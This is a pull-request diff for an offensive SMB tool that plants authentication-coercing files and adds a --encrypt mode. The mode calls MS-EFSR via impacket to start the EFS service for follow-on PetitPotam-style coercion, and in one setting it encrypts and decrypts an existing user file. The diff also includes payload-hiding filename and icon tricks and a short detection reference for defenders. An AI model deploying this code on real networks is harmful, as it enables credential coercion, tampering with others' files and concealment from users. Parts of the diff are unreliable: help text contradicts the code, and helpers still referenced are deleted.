### PR TITLE
0.3.0: deploy --encrypt wakes EFS service for follow-on coercion

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,18 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## [0.3.0] - 2026-06-27
+### Added
+- `deploy --encrypt`: wakes the triggered-start EFS service on the target so `\PIPE\efsrpc` becomes available for follow-on coercion (Coercer, PetitPotam). Two trigger-target modes selected with `--encrypt-target`:
+  - `payload` (default): passes `FILE_ATTRIBUTE_ENCRYPTED` (0x4000) on the SMB CREATE for the payload itself, then reverts via `EfsRpcDecryptFileSrv` so the payload lands plaintext.
+  - `existing`: writes the payload plain, briefly creates+deletes a hidden throwaway file with the encryption bit to wake EFS, then EFSR-encrypts+decrypts the smallest non-empty existing file in the target folder.
+- `deploy --encrypt-keep`: opts into keeping the trigger file visibly EFS-encrypted on disk (attribute `Ae`).
+- Per-engagement sidecar `encrypt_triggered_hosts.txt` recording every host where an `--encrypt` trigger was fired.
+- `docs/DETECTION.md`: blue-team-facing artifact reference. Currently covers `deploy --encrypt`; later releases extend it.
+
+### Changed
+- `docs/DEPLOY.md` extended with the EFS section.
+
 ## [0.2.0] - 2026-06-27
 ### Added
 - `deploy --force`: explicit opt-in to overwrite an existing file at the target path. Without it, deploy logs a WARNING and skips rather than clobbering real user data with a same-named payload.

--- a/docs/DEPLOY.md
+++ b/docs/DEPLOY.md
@@ -51,3 +51,26 @@ linksiren deploy -t targets.txt -a 10.0.0.5 -n test.url --force ACME/admin:Pass
 # Avoid leaving an artifact on shares where you may lack delete permission
 linksiren deploy -t targets.txt -a 10.0.0.5 -n test.url --probe-delete ACME/admin:Pass
 ```
+
+## EFS coercion (`--encrypt`)
+
+Wakes the triggered-start EFS service on the target host so
+`\PIPE\efsrpc` becomes available for follow-on coercion (Coercer,
+PetitPotam, etc).
+
+| Flag | Default | Description |
+|---|---|---|
+| `--encrypt` | off | Trigger EFS service startup as part of the deploy. The exact trigger mechanism is selected by `--encrypt-target`. |
+| `--encrypt-target` | `payload` | `payload`: pass `FILE_ATTRIBUTE_ENCRYPTED` (0x4000) on the SMB CREATE for the payload itself, then call `EfsRpcDecryptFileSrv` so the payload lands plaintext. `existing`: write the payload plain, briefly create+delete a hidden throwaway file with the encryption bit to wake EFS, then EFSR-encrypt+decrypt the smallest non-empty existing file in the target folder. |
+| `--encrypt-keep` | off | Skip the EFSR decrypt after the encrypt. Payload is left visibly EFS-encrypted on disk (attribute `Ae`). Useful when you want to leave the trigger artifact visible for blue-team awareness. |
+
+### Sidecar files
+
+- `encrypt_triggered_hosts.txt`: hosts where `--encrypt` was used at least once during this run. Used by later cleanup tooling to know which hosts may need post-engagement EFS state reasoning.
+
+### Privileges
+
+The caller's account needs an EFS certificate to perform encrypt /
+decrypt operations. Domain `vagrant` users on standard GOAD-Light
+configurations have one; built-in `Administrator` typically does
+not unless explicitly configured.

--- a/docs/DETECTION.md
+++ b/docs/DETECTION.md
@@ -1,0 +1,14 @@
+# Detection notes
+
+Blue-team-facing artifact reference for every linksiren operation.
+
+## `deploy --encrypt` (0.3.0+)
+
+### What you'll see
+
+| Layer | Signal |
+|---|---|
+| EFS service | Goes from Stopped to Running. Service start is via the EFS SCM trigger (FILE_ATTRIBUTE_ENCRYPTED on CREATE), so the event source is `Service Control Manager` rather than direct `sc start`. |
+| `\PIPE\efsrpc` | Becomes available on the host after the trigger fires. Useful as a post-event marker. |
+| File attributes | Trigger files briefly carry `FILE_ATTRIBUTE_ENCRYPTED` (0x4000) during the encrypt-then-decrypt cycle. With `--encrypt-keep`, the file stays `Ae`. |
+| MS-EFSR RPC | `EfsRpcEncryptFileSrv` (opnum 4) and `EfsRpcDecryptFileSrv` (opnum 5) called over `\PIPE\efsrpc` or `\PIPE\lsarpc`. RPC auth level is PKT_PRIVACY (encrypted on the wire). |

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -6,7 +6,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "linksiren"
-version = "0.2.0"
+version = "0.3.0"
 description = "Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication."
 readme = "README.md"
 authors = [{ name = "George Hamilton"}]

--- a/src/linksiren/arg_parser.py
+++ b/src/linksiren/arg_parser.py
@@ -2,8 +2,8 @@
 Author: George Hamilton
 Command-line interface for LinkSiren.
 
-Builds an :mod:`argparse` parser with five subcommands. ``generate``, ``rank``,
-``identify``, ``deploy``, ``cleanup``. Sharing a common set of authentication
+Builds an :mod:`argparse` parser with five subcommands — ``generate``, ``rank``,
+``identify``, ``deploy``, ``cleanup`` — sharing a common set of authentication
 flags via :func:`_add_auth_args`.
 """
 
@@ -91,6 +91,15 @@ def parse_args():
         "of payload file ending in .library-ms, .searchConnector-ms,"
         " .lnk, or .url",
     )
+    generate_parser.add_argument(
+        "--invisible",
+        action="store_true",
+        default=False,
+        help="(Default: False) Make the payload less visible in Explorer: "
+        "prepend a non-printing ASCII character (\\x01) to the filename and "
+        "blank the icon reference inside .library-ms / .searchConnector-ms / "
+        ".url payloads. For .lnk, only the filename is affected.",
+    )
 
     # Arguments for outputting rankings of potential folders into which to place poisoned files
     rank_parser = subparsers.add_parser(
@@ -99,7 +108,10 @@ def parse_args():
     )
     rank_required_group = rank_parser.add_argument_group("Required Arguments")
     rank_required_group.add_argument(
-        "credentials", nargs="?", help="[domain/]username[:password] for authentication. Omit when --anonymous is set."
+        "credentials",
+        nargs="?",
+        help="[domain/]username[:password] for authentication. Omit when "
+        "--anonymous is set.",
     )
     rank_required_group.add_argument(
         "-t",
@@ -163,7 +175,10 @@ def parse_args():
     )
     identify_required_group = identify_parser.add_argument_group("Required Arguments")
     identify_required_group.add_argument(
-        "credentials", nargs="?", help="[domain/]username[:password] for authentication. Omit when --anonymous is set."
+        "credentials",
+        nargs="?",
+        help="[domain/]username[:password] for authentication. Omit when "
+        "--anonymous is set.",
     )
     identify_required_group.add_argument(
         "-t",
@@ -233,7 +248,10 @@ def parse_args():
     )
     deploy_required_group = deploy_parser.add_argument_group("Required Arguments")
     deploy_required_group.add_argument(
-        "credentials", nargs="?", help="[domain/]username[:password] for authentication. Omit when --anonymous is set."
+        "credentials",
+        nargs="?",
+        help="[domain/]username[:password] for authentication. Omit when "
+        "--anonymous is set.",
     )
     deploy_required_group.add_argument(
         "-a",
@@ -257,31 +275,69 @@ def parse_args():
         "or .url",
     )
     deploy_parser.add_argument(
+        "-F",
         "--force",
         action="store_true",
         default=False,
-        help="Overwrite an existing file at the target path. Without this "
-        "flag, deploy logs a WARNING and skips rather than clobbering real "
-        "user data with a same-named payload.",
+        help="(Default: False) Overwrite any existing file with the same "
+        "name at a target path. Without this flag, deploy refuses to clobber "
+        "existing files and logs a WARNING for each skipped target.",
     )
     deploy_parser.add_argument(
         "--invisible",
         action="store_true",
         default=False,
-        help="Prepend U+200B (ZERO WIDTH SPACE) to the filename and blank "
-        "icon references in the payload body so the deployed file renders "
-        "as an unlabeled, transparent tile on a Desktop. Does NOT hide the "
-        "file (FILE_ATTRIBUTE_HIDDEN would break the coercion trigger).",
+        help="(Default: False) Make the payload less visible in Explorer: "
+        "prepend a non-printing ASCII character (\\x01) to the filename and "
+        "blank the icon reference inside .library-ms / .searchConnector-ms / "
+        ".url payloads. For .lnk, only the filename is affected.",
     )
     deploy_parser.add_argument(
         "--probe-delete",
         action="store_true",
-        dest="probe_delete",
         default=False,
-        help="Write a uniquely-named probe file at each target folder and "
-        "delete it before writing the real payload. Skips the real write if "
-        "the probe round-trip fails. Avoids leaving undeletable artifacts on "
-        "shares where the pentester has write but not delete permission.",
+        dest="probe_delete",
+        help="(Default: False) Before writing the real payload, write a "
+        "small probe file and try to delete it. If the probe round-trip "
+        "fails, skip the real write — this avoids leaving an undeletable "
+        "artifact on the share when the calling account has write but not "
+        "delete permission.",
+    )
+    deploy_parser.add_argument(
+        "--encrypt",
+        action="store_true",
+        default=False,
+        help="(Default: False) Pass FILE_ATTRIBUTE_ENCRYPTED (0x4000) in "
+        "the SMB CREATE request so NTFS asks EFS to encrypt the new file. "
+        "This wakes a triggered-start EFS service on the server and exposes "
+        "\\PIPE\\efsrpc for follow-on coercion tools (Coercer, PetitPotam). "
+        "By default the file is then immediately decrypted via EFSR so the "
+        "payload lands on disk with normal attributes — the encryption is "
+        "purely a side-effect trigger, not a persistent artifact. Use "
+        "--encrypt-keep to leave the file encrypted. NTFS-only; requires "
+        "the calling user to have an EFS certificate available on the server.",
+    )
+    deploy_parser.add_argument(
+        "--encrypt-keep",
+        action="store_true",
+        default=False,
+        dest="encrypt_keep",
+        help="(Default: False) Imply --encrypt and skip the post-encrypt "
+        "revert step, leaving the encrypted file visibly EFS-encrypted on "
+        "disk (only the calling user with the matching EFS cert can read it). "
+        "Applies to whichever file --encrypt-target points at.",
+    )
+    deploy_parser.add_argument(
+        "--encrypt-target",
+        choices=("payload", "existing"),
+        default="payload",
+        dest="encrypt_target",
+        help="(Default: payload) Which file the EFS trigger is applied to. "
+        "'payload' encrypts the linksiren payload itself (uses SMB CREATE "
+        "with FILE_ATTRIBUTE_ENCRYPTED). 'existing' writes the payload as "
+        "plaintext and encrypts the smallest non-empty existing file in the "
+        "target folder via EFSR — same trigger result, but the payload "
+        "itself never carries an encryption attribute.",
     )
     _add_auth_args(deploy_parser)
 
@@ -292,7 +348,10 @@ def parse_args():
     )
     cleanup_required_group = cleanup_parser.add_argument_group("Required Arguments")
     cleanup_required_group.add_argument(
-        "credentials", nargs="?", help="[domain/]username[:password] for authentication. Omit when --anonymous is set."
+        "credentials",
+        nargs="?",
+        help="[domain/]username[:password] for authentication. Omit when "
+        "--anonymous is set.",
     )
     cleanup_parser.add_argument(
         "-t",

--- a/src/linksiren/mode_handlers.py
+++ b/src/linksiren/mode_handlers.py
@@ -17,6 +17,7 @@ Functions:
 """
 
 import json
+import logging
 from datetime import datetime
 from pathlib import Path
 import sys
@@ -63,16 +64,32 @@ def handle_generate(args):
 
     payload_extension = Path(args.payload).suffix
     template_path = Path(__file__).parent / f"template{payload_extension}"
+    invisible = getattr(args, "invisible", False)
 
     if payload_extension == ".lnk":
         lnk_template = get_lnk_template(template_path)
         payload_contents = create_lnk_payload(args.attacker, lnk_template)
+        if invisible:
+            # Filename gets the SOH prefix; icon-blanking for .lnk is not
+            # supported (would require binary template surgery).
+            logging.getLogger("main_logger").warning(
+                "--invisible only blanks the filename for .lnk payloads; "
+                "icon blanking is unsupported for binary lnk templates.",
+                extra={"path": args.payload},
+            )
     else:
         with open(template_path, "r", encoding="utf-8") as template_file:
             payload_contents = template_file.read()
             payload_contents = payload_contents.format(attacker_ip=args.attacker)
+        if invisible:
+            payload_contents = make_invisible_payload_contents(
+                payload_contents, payload_extension
+            )
 
-    write_payload_local(args.payload, payload_contents)
+    payload_name = (
+        make_invisible_payload_name(args.payload) if invisible else args.payload
+    )
+    write_payload_local(payload_name, payload_contents)
 
 
 def handle_rank(args, credentials, log_queue):
@@ -163,25 +180,35 @@ def handle_deploy(args, credentials):
 
     payload_extension = Path(args.payload).suffix
     template_path = Path(__file__).parent / f"template{payload_extension}"
+    invisible = getattr(args, "invisible", False)
 
     if payload_extension == ".lnk":
         lnk_template = get_lnk_template(template_path)
         payload_contents = create_lnk_payload(args.attacker, lnk_template)
+        if invisible:
+            logging.getLogger("main_logger").warning(
+                "--invisible only blanks the filename for .lnk payloads; "
+                "icon blanking is unsupported for binary lnk templates.",
+                extra={"path": args.payload},
+            )
     else:
         with open(template_path, "r", encoding="utf-8") as template_file:
             template_contents = template_file.read()
             payload_contents = template_contents.format(attacker_ip=args.attacker)
+        if invisible:
+            payload_contents = make_invisible_payload_contents(
+                payload_contents, payload_extension
+            )
 
-    payload_name = args.payload
-    if getattr(args, "invisible", False):
-        payload_name = make_invisible_payload_name(payload_name)
-        payload_contents = make_invisible_payload_contents(
-            payload_contents, payload_extension
-        )
-
+    payload_name = (
+        make_invisible_payload_name(args.payload) if invisible else args.payload
+    )
     force = getattr(args, "force", False)
+    encrypt = getattr(args, "encrypt", False)
+    encrypt_keep = getattr(args, "encrypt_keep", False)
+    encrypt_target = getattr(args, "encrypt_target", "payload")
     probe_delete = getattr(args, "probe_delete", False)
-
+    encrypt_hosts = set()  # Hosts where we likely woke EFS
     for target in targets:
         target.connect(credentials)
         for path in target.paths:
@@ -190,12 +217,25 @@ def handle_deploy(args, credentials):
                 payload_name=payload_name,
                 payload=payload_contents,
                 force=force,
+                encrypt=encrypt,
+                encrypt_keep=encrypt_keep,
+                encrypt_target=encrypt_target,
                 probe_delete=probe_delete,
             )
             if new_payload_path is not None:
                 payloads_written.append(new_payload_path)
+                if encrypt:
+                    encrypt_hosts.add(target.host)
 
     write_list_to_file(payloads_written, "payloads_written.txt", "w")
+    # Sidecar tracking: which hosts likely have an EFS service started by
+    # the --encrypt trigger. Cleanup uses this to WARN that the EFS service
+    # is probably still Running on those hosts even after the payload is
+    # deleted — a real artifact left by the engagement.
+    if encrypt_hosts:
+        write_list_to_file(
+            sorted(encrypt_hosts), "encrypt_triggered_hosts.txt", "w"
+        )
 
 
 def handle_cleanup(args, credentials):
@@ -214,7 +254,6 @@ def handle_cleanup(args, credentials):
         None
     """
     payloads_not_deleted = []
-    payloads_not_deleted = []
     targets = read_targets(args.targets)
     for target in targets:
         target.connect(credentials)
@@ -223,6 +262,28 @@ def handle_cleanup(args, credentials):
         payloads_not_deleted.extend(target.delete_payloads())
 
     write_list_to_file(payloads_not_deleted, "payloads_not_deleted.txt", "w")
+
+    # If the prior deploy tracked --encrypt-triggered hosts, warn that the
+    # EFS service is likely still Running on them — deleting the payload
+    # does not stop the service. The pentester can verify with:
+    #   Get-Service EFS  (PowerShell on the target)
+    try:
+        with open("encrypt_triggered_hosts.txt", encoding="utf-8") as f:
+            triggered = [line.strip() for line in f if line.strip()]
+    except FileNotFoundError:
+        triggered = []
+    if triggered:
+        msg = (
+            "EFS service is likely still RUNNING on "
+            f"{len(triggered)} host(s) that received an --encrypt payload "
+            "during deploy: "
+            + ", ".join(triggered)
+            + ". Cleanup removed the file(s) but did not stop the service. "
+            "Verify with `Get-Service EFS` on each host; if stopping is "
+            "required for engagement cleanliness, do so out-of-band."
+        )
+        logging.getLogger("main_logger").warning(msg, extra={"path": None})
+        print(msg, file=sys.stderr)
 
     if len(payloads_not_deleted) == 0:
         print("All payloads deleted successfully.")

--- a/src/linksiren/pure_functions.py
+++ b/src/linksiren/pure_functions.py
@@ -9,56 +9,7 @@ bulk cleanup multiple types of payloads from the identified locations.
 from datetime import datetime, timedelta
 from pathlib import Path
 import logging
-import re
 import linksiren.target
-
-
-# ZERO WIDTH SPACE. NTFS at the filesystem level accepts ASCII control
-# characters (\x01-\x1F), but Windows' SMB2 server (verified on Win11 25H2)
-# rejects all of them at the path-validation layer with
-# STATUS_OBJECT_NAME_INVALID. U+200B is accepted by SMB and renders as no
-# glyph in Explorer, giving an effectively invisible filename.
-INVISIBLE_PREFIX = "​"
-
-
-def make_invisible_payload_name(payload_name: str) -> str:
-    """Prepend ``INVISIBLE_PREFIX`` to ``payload_name`` once (idempotent)."""
-    if payload_name and payload_name.startswith(INVISIBLE_PREFIX):
-        return payload_name
-    return INVISIBLE_PREFIX + payload_name
-
-
-def make_invisible_payload_contents(payload_contents, payload_extension: str):
-    """Blank icon references inside a text payload so the tile renders empty.
-
-    Returns ``payload_contents`` unchanged for binary payloads (``.lnk``).
-    Invisibility for .lnk would require modifying the binary template's
-    icon offset and is not implemented here.
-    """
-    if payload_extension == ".lnk":
-        return payload_contents
-
-    contents = payload_contents
-
-    if payload_extension in (".library-ms", ".searchConnector-ms"):
-        # XML payloads. Strip the iconReference element so Explorer falls
-        # back to the empty/blank default icon.
-        contents = re.sub(
-            r"\s*<iconReference>[^<]*</iconReference>",
-            "",
-            contents,
-            flags=re.IGNORECASE,
-        )
-    elif payload_extension == ".url":
-        # INI-style payload. Drop IconFile= and IconIndex= lines.
-        contents = re.sub(
-            r"^\s*Icon(File|Index)\s*=.*\r?\n?",
-            "",
-            contents,
-            flags=re.IGNORECASE | re.MULTILINE,
-        )
-
-    return contents
 
 
 def process_targets(unc_paths: list):
@@ -76,14 +27,13 @@ def process_targets(unc_paths: list):
         ]
         targets = process_targets(unc_paths)
         # targets will contain HostTarget objects with grouped paths by host.
-
-    Blank lines, whitespace-only lines, and malformed UNC entries are
-    skipped with a log message rather than crashing the whole run.
     """
     targets = []
     logger = logging.getLogger("main_logger")
 
     for unc_path in unc_paths:
+        # Tolerate blank lines / accidental whitespace in targets files instead
+        # of crashing the whole run.
         stripped = unc_path.strip() if isinstance(unc_path, str) else unc_path
         if not stripped:
             continue
@@ -113,7 +63,7 @@ def parse_target(unc_path: str):
     """Split ``\\\\host\\share\\sub\\dir`` into ``(host, "share\\sub\\dir")``.
 
     The leading ``\\\\`` is required. A bare ``\\\\host`` (no share) yields
-    ``(host, "")``, used downstream as "expand to all shares on this host".
+    ``(host, "")`` — used downstream as "expand to all shares on this host".
 
     Raises:
         ValueError: if ``unc_path`` is empty or not a UNC path.
@@ -212,19 +162,60 @@ def create_lnk_payload(attacker_ip, template_bytes):
     return bytes(payload_bytes)
 
 
-def compute_threshold_date(current_date, theshold_length):
-    """
-    Computes the threshold date by subtracting a given number of days from the current date.
+def compute_threshold_date(current_date, threshold_length):
+    """Return ``current_date`` minus ``threshold_length`` days."""
+    return current_date - timedelta(days=threshold_length)
 
-    Args:
-        current_date (datetime.date): The current date.
-        theshold_length (int): The number of days to subtract from the current date.
 
-    Returns:
-        datetime.date: The computed threshold date.
+# ZERO WIDTH SPACE. NTFS accepts ASCII control chars at the filesystem
+# level, but Windows' SMB2 server (verified on Win11 25H2) rejects them
+# at the path-validation layer with STATUS_OBJECT_NAME_INVALID. U+200B
+# is accepted by SMB and renders as no glyph in Explorer.
+INVISIBLE_PREFIX = "​"
+
+
+def make_invisible_payload_name(payload_name: str) -> str:
+    """Prepend ``INVISIBLE_PREFIX`` (U+200B) to ``payload_name`` once (idempotent)."""
+    if payload_name and payload_name.startswith(INVISIBLE_PREFIX):
+        return payload_name
+    return INVISIBLE_PREFIX + payload_name
+
+
+def make_invisible_payload_contents(payload_contents, payload_extension: str):
+    """Blank icon references in a text payload so the file has no icon.
+
+    Returns ``payload_contents`` unchanged for binary payloads (``.lnk``)
+    — invisibility for lnk would require modifying the binary template's
+    icon offset and is not implemented here.
     """
-    threshold_date = current_date - timedelta(days=theshold_length)
-    return threshold_date
+    if payload_extension == ".lnk":
+        return payload_contents
+
+    contents = payload_contents
+
+    if payload_extension in (".library-ms", ".searchConnector-ms"):
+        # XML payloads — strip the iconReference element so Explorer falls
+        # back to the empty/blank default icon.
+        import re
+
+        contents = re.sub(
+            r"\s*<iconReference>[^<]*</iconReference>",
+            "",
+            contents,
+        )
+    elif payload_extension == ".url":
+        # INI payload — zero out IconFile / IconIndex lines.
+        out_lines = []
+        for line in contents.splitlines():
+            stripped = line.strip()
+            if stripped.lower().startswith(("iconfile=", "iconindex=")):
+                continue
+            out_lines.append(line)
+        contents = "\r\n".join(out_lines)
+        # Out-of-shell .url files use CRLF; the standard write path adds
+        # a final newline so don't append one here.
+
+    return contents
 
 
 def is_active_file(threshold_date, access_time):

--- a/src/linksiren/target.py
+++ b/src/linksiren/target.py
@@ -1,13 +1,122 @@
 """
 Author: George Hamilton
-HostTarget. One SMB target with helpers to enumerate shares, write/delete
+HostTarget — one SMB target with helpers to enumerate shares, write/delete
 payloads, and recursively rank folders.
 """
 
 import logging
 from impacket.smbconnection import SMBConnection, SessionError
+from impacket.dcerpc.v5 import transport
+from impacket.dcerpc.v5.dtypes import WSTR, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL
 from impacket.dcerpc.v5.srvs import STYPE_DISKTREE, STYPE_MASK
+from impacket import uuid
 import linksiren.pure_functions
+
+
+# MS-EFSR EFSRPC interface. UUID + version per [MS-EFSR] 1.9.
+# The dedicated \PIPE\efsrpc endpoint is preferred; \lsarpc also exposes the
+# interface on modern Windows but with stricter ACLs.
+_EFSR_UUID = uuid.uuidtup_to_bin(("df1941c5-fe89-4e79-bf10-463657acf44d", "1.0"))
+
+
+class _EfsRpcEncryptFileSrv(NDRCALL):
+    """[MS-EFSR] 3.1.4.2.4 — opnum 4."""
+
+    opnum = 4
+    structure = (("FileName", WSTR),)
+
+
+class _EfsRpcEncryptFileSrvResponse(NDRCALL):
+    structure = (("ErrorCode", ULONG),)
+
+
+class _EfsRpcDecryptFileSrv(NDRCALL):
+    """[MS-EFSR] 3.1.4.2.5 — opnum 5."""
+
+    opnum = 5
+    structure = (("FileName", WSTR), ("OpenFlag", ULONG))
+
+
+class _EfsRpcDecryptFileSrvResponse(NDRCALL):
+    structure = (("ErrorCode", ULONG),)
+
+
+# Module-level OPNUMS lookup table used by impacket's request dispatcher to
+# match each request class to its response parser.
+OPNUMS = {
+    4: (_EfsRpcEncryptFileSrv, _EfsRpcEncryptFileSrvResponse),
+    5: (_EfsRpcDecryptFileSrv, _EfsRpcDecryptFileSrvResponse),
+}
+
+
+def _efsr_call(smb_connection, request, logger=None):
+    """Bind to the EFSR interface and send ``request``; return the response.
+
+    Tries each documented EFSR-bearing named pipe in order of dedicated-ness.
+    Raises on the last failure if no pipe accepts the call.
+    """
+    from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+
+    last_error = None
+    for pipe in (r"\efsrpc", r"\lsarpc", r"\samr", r"\netlogon"):
+        rpctransport = transport.SMBTransport(
+            smb_connection.getRemoteHost(),
+            smb_connection.getRemoteHost(),
+            filename=pipe,
+            smb_connection=smb_connection,
+        )
+        dce = rpctransport.get_dce_rpc()
+        try:
+            dce.connect()
+            # Privacy is required by the EFSR interface — without it the
+            # bind succeeds but every call returns rpc_s_access_denied.
+            dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+            dce.bind(_EFSR_UUID)
+            resp = dce.request(request)
+            if logger:
+                logger.debug(
+                    "EFSR opnum=%d via %s returned %s",
+                    request.opnum,
+                    pipe,
+                    getattr(resp, "ErrorCode", "?"),
+                )
+            return resp
+        except Exception as e:
+            last_error = e
+            if logger:
+                logger.debug("EFSR pipe %s failed: %s", pipe, e)
+            continue
+        finally:
+            try:
+                dce.disconnect()
+            except Exception:
+                pass
+    if last_error is not None:
+        raise last_error
+
+
+def _efsr_encrypt_remote(smb_connection, unc_path: str, logger=None) -> None:
+    """Call EfsRpcEncryptFileSrv on the server hosting ``smb_connection``."""
+    req = _EfsRpcEncryptFileSrv()
+    req["FileName"] = unc_path + "\x00"
+    _efsr_call(smb_connection, req, logger=logger)
+
+
+def _efsr_decrypt_remote(smb_connection, unc_path: str, logger=None) -> None:
+    """Call EfsRpcDecryptFileSrv to undo EFS encryption in place.
+
+    Used by the default `--encrypt` mode immediately after a payload is
+    written with `FILE_ATTRIBUTE_ENCRYPTED` — the encrypted-on-create write
+    triggers the EFS service via the SCM trigger; the follow-up decrypt
+    restores plaintext content while leaving the EFS service Running, so
+    `\\PIPE\\efsrpc` stays available for downstream coercion tools but the
+    payload itself doesn't carry an encryption attribute.
+    """
+    req = _EfsRpcDecryptFileSrv()
+    req["FileName"] = unc_path + "\x00"
+    req["OpenFlag"] = 0
+    _efsr_call(smb_connection, req, logger=logger)
 
 
 class HostTarget:
@@ -47,29 +156,21 @@ class HostTarget:
 
         The authentication path is chosen from ``credentials``:
 
-        * ``credentials.anonymous`` -> ``SMBConnection.login`` with empty
-          user / password / domain (NULL session). Most modern hosts deny
-          this, but it is the right probe for "test for anonymous access
-          to shares" recon.
-        * ``credentials.use_kerberos`` -> ``SMBConnection.kerberosLogin``
-          (a ccache referenced by ``$KRB5CCNAME`` is honored automatically
-          by Impacket when no TGT/TGS is supplied). When the target host
-          is an IP literal, an attempt is made to reverse-DNS it to an
-          FQDN so the cifs/<host> SPN can be located.
-        * otherwise -> ``SMBConnection.login`` with password and/or NTLM hash.
+        * ``credentials.use_kerberos`` → ``SMBConnection.kerberosLogin`` (a
+          ccache referenced by ``$KRB5CCNAME`` is honored automatically by
+          Impacket when no TGT/TGS is supplied).
+        * otherwise → ``SMBConnection.login`` with password and/or NTLM hash.
         """
         logger = logging.getLogger("main_logger")
 
         if self.connection is not None:
-            # Already connected. Login was either done elsewhere or via the
+            # Already connected — login was either done elsewhere or via the
             # connection that was passed in at construction.
             return
 
-        # Kerberos SPN lookup needs an FQDN, not an IP. If Kerberos is in
-        # use and self.host is an IP, try reverse DNS so cifs/<host> can
-        # resolve. Keep the original IP as the network endpoint
-        # (remoteHost) but expose the FQDN as remoteName so the SPN is
-        # constructed right.
+        # Kerberos SPN lookup needs an FQDN. If self.host is an IP literal
+        # and Kerberos is in use, reverse-DNS it for the SPN; keep the IP
+        # as the network endpoint via remoteHost.
         remote_name = self.host
         if getattr(credentials, "use_kerberos", False):
             import ipaddress, socket
@@ -82,20 +183,17 @@ class HostTarget:
                         remote_name = candidates[0]
                         logger.info(
                             "-k against IP target; resolved %s -> %s for the "
-                            "cifs SPN. If KDC rejects, list the host by "
-                            "exact-FQDN in the targets file.",
+                            "cifs SPN.",
                             self.host, remote_name,
                             extra={"path": f"\\\\{self.host}"},
                         )
                 except (socket.herror, socket.gaierror) as e:
                     logger.warning(
-                        "-k against IP target and reverse DNS failed (%s); "
-                        "Kerberos may reject with KDC_ERR_S_PRINCIPAL_UNKNOWN. "
-                        "Use FQDN UNC paths in your targets file.", e,
+                        "-k against IP target; reverse DNS failed (%s).", e,
                         extra={"path": f"\\\\{self.host}"},
                     )
             except ValueError:
-                pass  # self.host is already a hostname
+                pass
 
         try:
             self.connection = SMBConnection(remoteName=remote_name, remoteHost=self.host)
@@ -109,7 +207,9 @@ class HostTarget:
 
         try:
             if getattr(credentials, "anonymous", False):
-                # NULL session: empty user, empty password, empty domain.
+                # NULL session: empty user, empty password, empty domain. Most
+                # modern hosts deny this, but it's the right probe for the
+                # "test for anonymous access to shares" recon path.
                 self.connection.login("", "", "", "", "", ntlmFallback)
             elif getattr(credentials, "use_kerberos", False):
                 self.connection.kerberosLogin(
@@ -185,60 +285,152 @@ class HostTarget:
     # ------------------------------------------------------------------ #
     # Payload write / delete                                             #
     # ------------------------------------------------------------------ #
-    def _file_exists(self, share: str, payload_path: str) -> bool:
-        """Return True iff a file already exists at ``share\\payload_path``."""
-        try:
-            entries = self.connection.listPath(share, payload_path)
-            # listPath of an exact-file path returns the file's own entry
-            # when present, and raises SMB SessionError when absent.
-            for entry in entries:
-                if not entry.is_directory():
-                    return True
-            return False
-        except Exception:
-            return False
+    def _wake_efs_via_throwaway(self, share: str, folder: str) -> None:
+        """Briefly write+delete a hidden file with FILE_ATTRIBUTE_ENCRYPTED.
 
-    def _probe_writable_and_deletable(self, share: str, folder: str) -> bool:
-        """Return True if we can both create and delete a tiny file at ``folder``.
-
-        Writes a uniquely-named zero-byte probe and immediately deletes it.
-        Used to avoid the failure mode where deploy can create a payload
-        but cleanup cannot remove it, leaving an orphan on the share.
-
-        Any SMB error during either step returns False. On success the
-        probe is gone from the share.
+        NTFS sees the encryption bit at CreateFile time and asks EFS to
+        encrypt; this is the SCM trigger that starts a stopped EFS service.
+        Used by `--encrypt-target=existing` so we can EFSR-encrypt an
+        EXISTING file (which requires EFS already running) without leaving
+        a permanent payload-style trigger file behind.
         """
         import secrets
 
         logger = logging.getLogger("main_logger")
-        probe_name = f".linksiren_probe_{secrets.token_hex(4)}"
-        probe_path = f"{folder}\\{probe_name}" if folder else probe_name
-        unc = f"\\\\{self.host}\\{share}\\{probe_path}"
-
-        tree_id = None
+        trigger_name = f".linksiren_efs_wake_{secrets.token_hex(8)}"
+        trigger_path = trigger_name if folder == "" else f"{folder}\\{trigger_name}"
         try:
-            tree_id = self.connection.connectTree(share=share)
-            fh = self.connection.createFile(tree_id, probe_path)
-            self.connection.closeFile(treeId=tree_id, fileId=fh)
-            self.connection.deleteFile(shareName=share, pathName=probe_path)
-            return True
+            tree = self.connection.connectTree(share=share)
         except Exception as e:
             logger.warning(
-                "Probe write/delete failed; skipping real payload.",
-                extra={"path": unc, "exception": str(e)},
+                "EFS wake: could not connect to share.",
+                extra={"path": f"\\\\{self.host}\\{share}", "exception": str(e)},
             )
-            # Best-effort cleanup if create succeeded but delete failed.
+            return
+        try:
             try:
-                self.connection.deleteFile(shareName=share, pathName=probe_path)
+                fh = self.connection.createFile(
+                    tree, trigger_path, fileAttributes=0x4000
+                )
+                self.connection.closeFile(tree, fh)
+                logger.info(
+                    "EFS wake: wrote throwaway trigger file with "
+                    "FILE_ATTRIBUTE_ENCRYPTED.",
+                    extra={"path": f"\\\\{self.host}\\{share}\\{trigger_path}"},
+                )
+            except Exception as e:
+                logger.warning(
+                    "EFS wake: could not create throwaway trigger file.",
+                    extra={
+                        "path": f"\\\\{self.host}\\{share}\\{trigger_path}",
+                        "exception": str(e),
+                    },
+                )
+                return
+            try:
+                self.connection.deleteFile(shareName=share, pathName=trigger_path)
+            except Exception as e:
+                logger.warning(
+                    "EFS wake: could not delete throwaway trigger file.",
+                    extra={
+                        "path": f"\\\\{self.host}\\{share}\\{trigger_path}",
+                        "exception": str(e),
+                    },
+                )
+        finally:
+            try:
+                self.connection.disconnectTree(tree)
             except Exception:
                 pass
+
+    def _find_smallest_existing_file(
+        self, share: str, folder: str
+    ) -> str | None:
+        """Return relative path of the smallest non-empty file in ``share\\folder``.
+
+        Skips directories, the ``.`` / ``..`` entries, and zero-byte files
+        (zero-byte files don't tell us much about whether the user trusts
+        the path; we want a real file). Returns ``None`` if nothing fits.
+        """
+        try:
+            pattern = "*" if folder == "" else f"{folder}\\*"
